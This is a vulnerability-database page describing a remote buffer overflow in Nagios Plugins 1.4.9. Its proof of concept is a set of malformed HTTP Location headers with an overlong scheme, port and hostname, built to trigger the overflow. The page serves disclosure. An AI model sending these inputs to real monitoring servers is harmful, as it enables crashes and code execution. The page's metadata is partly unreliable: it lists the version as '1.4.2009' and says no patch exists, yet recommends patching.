header-logo
Suggest Exploit
vendor:
Nagios Plugins
by:
Unknown
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Nagios Plugins
Affected Version From: 1.4.2009
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Remote Buffer-Overflow Vulnerability in Nagios Plugins

The Nagios Plugins software is vulnerable to a remote buffer-overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary machine code in the context of the affected users. The vulnerability exists due to the software's failure to properly bounds-check user-supplied data before copying it to a buffer that is not large enough.

Mitigation:

Apply the latest patch or upgrade to a non-vulnerable version of the Nagios Plugins software.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25952/info

Nagios Plugins are prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.

Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software.

This issue affects Nagios Plugins 1.4.9; other versions may also be vulnerable. 

Location: htttttttttttttttttttttttttttttttttttttttttttp://example.com/

Location: http://example.com:1234567890123456789012345678901234567890/

Location:
http://tooooooooooooooooooooooooooooooooooooooooooooooooooo.loooooooooooooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.looooooooo
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.loooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.
loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oong.looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
ooooooong.loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oooooooooooong.host-name.example.com/